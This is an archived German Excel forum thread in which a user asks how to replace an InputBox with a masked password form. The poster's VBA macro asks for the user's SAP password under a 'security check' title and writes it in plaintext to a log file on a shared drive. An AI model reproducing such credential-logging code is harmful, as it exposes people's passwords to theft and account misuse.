Anzeige
Archiv - Navigation
344to348
Aktuelles Verzeichnis
Verzeichnis Index
Übersicht Verzeichnisse
Vorheriger Thread
Rückwärts Blättern
Nächster Thread
Vorwärts blättern
Anzeige
HERBERS
Excel-Forum (Archiv)
20+ Jahre Excel-Kompetenz: Von Anwendern, für Anwender
344to348
344to348
Aktuelles Verzeichnis
Verzeichnis Index
Verzeichnis Index
Übersicht Verzeichnisse
Inhaltsverzeichnis

Form statt inputbox öffnen

Form statt inputbox öffnen
28.11.2003 11:28:40
Matthias
hallo zusammen,

ich möchte eine verdeckte password eingabe erzielen.

bisher habe ich folgendes


Private Sub pass()
Const BoxTitle = "Sicherheitsabfrage"
Dim User, x
Dim dat As Integer
Dim temp As String
Dim temp2 As String
User = Application.UserName
Dim passw As String
temp = InputBox("Bitte geben Sie Ihr SAP-Passwort ein", BoxTitle)
If temp = "" Then
Do
temp2 = InputBox("Bitte achten Sie auf die richtige schreibweise und wiederholen Sie Ihr SAP-Passwort", BoxTitle)
Loop Until temp2 <> ""
End If
dat = FreeFile
Open "Q:/pass_" & User & ".log" For Output As dat
Print #dat, temp & "  +  " & temp2
Close
End Sub


ich habe noch ein form "sappw" mit dem maskierten input "passw"

wie kann ich diese form aufrufen anstatt die input box?

vielen dank.

1
Beitrag zum Forumthread
Beitrag zu diesem Forumthread

Betreff
Datum
Anwender
Anzeige
AW: Form statt inputbox öffnen
28.11.2003 11:51:53
Matthias G
Hallo Namensvetter,

Ich hab mal ne Beispieldatei hochgeladen:
https://www.herber.de/bbs/user/2205.xls

Wichtig ist die Eigenschaft "PasswordChar" in der Textbox, sie legt fest, ob die Eingabe verdeckt sein soll oder nicht.
Nach Aufruf des UserForms steht in der Eigenschaft "Tag", ob das Kennwort richtig war (True) oder ob die Eingabe abgebrochen wurde (False).

Ich hoffe, du kannst das Ganze an Deine Bedürfnisse anpassen.

Gruß,
Matthias

Beliebteste Forumthreads (12 Monate)

Anzeige

Beliebteste Forumthreads (12 Monate)

Anzeige
Anzeige
Anzeige